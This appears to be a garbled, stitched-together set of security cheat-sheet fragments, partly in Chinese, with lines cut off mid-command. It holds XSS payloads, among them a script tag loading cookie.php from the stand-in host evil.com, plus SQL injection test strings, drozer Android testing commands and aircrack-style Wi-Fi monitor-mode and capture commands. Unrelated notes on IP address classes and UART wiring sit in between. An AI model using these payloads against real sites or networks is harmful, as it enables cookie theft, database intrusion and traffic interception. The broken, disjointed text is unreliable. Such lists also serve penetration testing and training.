0x00
alert confirm prompt
0x01
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evil.com/cookie.php"></script>
<script>location.href="http://www
alert confirm prompt
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evil.com/cookie.php"></script>
<script>location.href="http://www
'
1+1
3-1
value + 0
1 or 1=1
1) or (1=1
value or 1=2
value) or (1=1
1 and 1=2
1) and (1=2
1 or 'ab'='a'+'b'
1) or ('ab'='a'+'b'
1 or 'ab'='a''b'
1) or ('ab'='a''b'
1 or 'ab'='
官方地址
http://mwr.to/drozer
adb install agent.apk
adb forward tcp:31415 tcp:31415
drozer console connect
dz> run app.packa
P地址根据网络号和主机号的数量而分为A、B、C三类。A类地址通常为大型网络而提供,全世界总共只有126个只可能的A类网络,每个A类网络最多可以连接16777214台主机。B类地址适用于中等规模的网络,全世界大约有16000个B类网络,每个B类网络最多可以连接65534台主机。C类地址适用于校园网等小型网络,每个C类网络最多可以有254台主机。
1.A类地址
(1)A类地址第1字节为网络地址,其它3个字节为主机地址。
(2)A类地址范围:1.0.0.1—126.255.255.254
(3)A类地址中的私有地址和保留地址:① 10.X.X.X是私有地址(所谓的私有地址就是在
黑/黄:GND
红:TX
白:RX
sudo apt-get -y install libtool shtool autoconf git-core pkg-config make gcc
cd /opt
git clone git://git.osmocom.org/libosmocore.git
cd libosmocore/ $ autoreconf -i $ ./configure
make $ sudo make install$ ldconfig
cd ..
Kali
iwconfig
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
airmon-ng check kill
airmon-ng start wlan0
monitor mode enabled on mon0
airodump-ng wlan0mon
airodump-ng -c 11 -w test –bssid(路由器MAC) wlan0mo